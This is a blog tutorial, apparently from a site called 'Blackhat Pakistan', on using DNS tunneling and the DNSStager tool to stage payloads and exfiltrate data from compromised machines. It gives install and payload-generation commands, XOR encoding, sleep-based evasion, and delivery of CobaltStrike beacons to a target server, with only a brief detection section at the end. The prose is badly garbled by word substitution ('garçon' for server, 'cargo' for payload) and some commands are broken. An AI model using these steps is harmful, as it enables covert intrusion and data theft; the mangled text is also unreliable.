All About HackingBlackhat Hacking ToolsFree CoursesHacking

Tutorial: How to exfiltrate or execute files in compromised machines with DNS Complete Guide by Blackhat Pakistan 2023

Today we will learn about How to exfiltrate or execute files in compromised machines with DNS

Culprits are constantly changing their modus operandi and using different strategies and ways to compromise their targets and exfiltrate data from the internal networks, indeed in the most delicate situations. For illustration, TCP business is blocked by dereliction in a network, and the communication between a vicious agent installed on a specific target with its C2 garçon isn’t possible. In those kinds of scripts, using other network protocols like ICPM and DNS could be the perfect vehicle to negotiate the hard task of transferring internal information over the walls.

What is DNS protocol

The DNS protocol is decreasingly being used as a pathway for data exfiltration, indeed by infected bias preliminarily infected by trouble interposers during its vicious conditioning. DNS tunneling involves transferring the network business via DNS harborage 53, which is frequently audited and flagged by network firewalls, indeed coming- generation bones

vicious software can use especially drafted requests to take advantage of the DNS protocol and shoot only well- defined gobbets in the middle of a implicit licit DNS business. Figure 1 below shows how the introductory data about a target machine could be transferred between the internal agent and its C2 garçon available on the internet.( CLICK IMAGES TO ENLARGE)

Figure 1: Data exfiltration via DNS protocol.

As presented over, the sensitive data can be added at the middle of a request, in raw formate( 1 and 2), or indeed using a hexadecimal encoder( 3), the stylish way to avoid implicit not accepted skivvies

In general, the vary of data stolen by culprits may include

  • face-to-face identifiable information( PII) similar as introductory details, credit card, social security figures and so on.
  • Regulated data related to Payment Industry Data Security Standard( PCI DSS) and Health Insurance Portability and Responsibility Act( HIPAA) compliance.
  • Intellectual property gives an association or culprits a competitive advantage.
  • Other sensitive information includes nonpublic information, documents, contracts, company financials, payroll information, emails and every critical secret.

Data encryption malware is an excellent system to introduce the subject. As the system used by culprits during the ransomware has changed, now they’re using the stolen data to put the victims on alert, publishing the secrets on dark web forums to force the victims to pay the rescue. culprits exfiltrate the data before cracking all the data.

still, the exfiltration of data from internal networks is frequently seen as a big challenge, as security products block TCP business. At this point, DNS protocol can be abused to communicate with the Internet when TCP gregarious business isn’t possible by dereliction.

Also Read:Contemporary UEFI Bootkits by Blackhat Pakistan 2023

Tutorial DNSStager

DNSStager is an open- source tool used to hide a vicious cargo over DNS, recoup it via multiple DNS records similar as IPv6 and TXT, and fit the full cargo into memory. rather of only carrying data from the internal network, we can produce a strong connection like a C2 garçon to execute 2nd stage loads on the target machine.

In short, DNSStager creates a mischief DNS garçon that resolves fake requests to AAAA and TXT records. These requests are a knob of the cargo( completely decoded and translated) and ready to be used by the DNSStager agent. This tool can induce C or GoLand agents, a configuration defined before starting the laboratory.

Figure 2 shows how DNSStager works and how the garçon resolves a request.

Figure 2: DNSStager, high-level diagram (source).

In detail, the “client.exe ” train illustrated in Figure 2 over is the DNSStager agent created and dropped on the target machine. DNSStarger encodes the vicious cargo, resolve it into gobbets, and makes it ready to resolve via the “client.exe ” agent C or GoLand depending on the nature of the asked script).

After entering all the information via DNS protocol and avoiding network walls, the agent will fit the final cargo into the memory and execute the shellcode that implements process/ memory injection ways.

To start this trip, we’re furnishing below the essential way to conduct this laboratory with success.

1. DNSStager installation and execution

To install DNSStager, it’s necessary to clone it first from the official repository using the following command, install it, and execute it.

git clone install -r requirements.txt
apt install mingw-w64
Figure 3: Banner of DNSStager confirming that it was installed successfully.

2. Configuring the DNS server

The first step is pointing the sphere to the DNSStager IP address to resolve and handle any DNS request rightly.

For illustration, controlling a sphere called “ ”, we can produce a subdomain called “ ” and the “ NS ” – Name Garçon after running DNSStager

Figure 4:  Configuration of the DNS name to handle the DNS requests.

As observed in Figure 4, any request coming to the domain will be handled by, which is the DNSStager instance that we are running.

3. DNSStager options

DNSStarger is equipped with a lot of functionalities.

Figure 5: Options of DNSStager server.

The “- sphere ” option is used to elect the primary sphere used to handle the DNS requests, in this case, “ ”. also, as a way of bypassing firewalls, the “- prefix ” option can be used to add a prefix as “ cdn ”. Some exemplifications are presented below.

The other options are described below

  • – cargo the DNSStager cargo “ agent ” generated.
  • – affair Affair path to save DNSStager executable cargo “ agent. ”
  • –shellcode_path The raw/ caddy shellcode path.
  • – xorkey XOR key to render the cargo with.
  • – sleep Used to sleep for N seconds between each DNS request.

In addition, the available loads can be vindicated by using the flag “ – loads ”

Figure 6: DNSStager avaialble payloads.

4. Generate the payload/agent

DNSStager cipher the cargo using XOR encoder/ encrypter. The XOR key can be specified by using the command “ – xorkey ”.

The complete command can be observed then

sudo ./ –domain –payload x64/c/ipv6 –output /tmp/a2.exe –prefix cloud-srv- –shellcode_path ~/payload.bin –sleep 1 –xorkey 0x10

Figure 7: Generation of the DNSStrager agent.

In addition, a sleep time between each request can be added using the option “ – sleep ” – a way of escaping discovery.

5. DNSStager with CobaltStrike beacons

The shellcode used in this script can be a CobaltStrike lamp to take advantage of the panoply of features handed by this red teaming suite.

also, rather of using the available DNSStager loads, we can produce the CobaltStrike cargo as demonstrated in Figure 8.

Figure 8: Generation of the DNSStrager payload via CobaltStrike suite.

So, from this point, we need to produce the agent using the same command handed over, but this time indicating the path of the generated cargo via CobaltStrike.

6. Executing the agent

At this moment, we can execute the agent on the target machine, in this case, a Windows Garçon 2019.

Figure 9: CobaltStrike beacon running through DNS using DNSStager.

After executing the agent with the CobaltStrike lamp outside, we can see the DNS business generated between the target machine and the DNSStager garçon. In detail, a aggregate of 59 DNS AAAA requests were transferred to produce the final cargo. From the security point of view, we can also add some sleep between each request to make this kind of exertion less noisy.

Figure 10: DNS request after executing the DNSStager agent.

DNS protocol and how criminals use it

DNS protocol reveals a potent way abused by culprits in grueling scripts because it can break walls when no TCP business is allowed by dereliction. In this sense, DNS tunneling can be used in a customized way like a C2 structure to perform vicious conditioning.

DNS protocol is a good choice for data exfiltration scripts and cargo prosecution. According to CheckPoint, some pointers should be taken into account to descry DNS tunneling, videlicet.

  • Monitoring sphere requests the requests participated during vicious scripts are decoded with a request name So, the examination and monitoring between licit and bad business is a good way of precluding scripts of this nature.
  • operation of unusual disciplines DNS tunneling works grounded on DNS names. So, if a high volume of requests is observed to an uncommon sphere name, that gesteshould produce an alert.
  • High DNS business volume A shaft in DNS business can be an accurate index of DNS tunneling. Because each DNS request has a maximum size of 253 skivvies
  • , transferring a large cargo over DNS needs numerous DNS requests performing in abnormal geste..

And last but not least, covering all the network business similar as TCP, DNS, ICMP or indeed the most fantastic protocols can give you a real chance of detecting these kinds of exploitations beforehand. So, let’s take this subject seriously.

Sources [How to exfiltrate or execute files]

Leave a Reply

Your email address will not be published. Required fields are marked *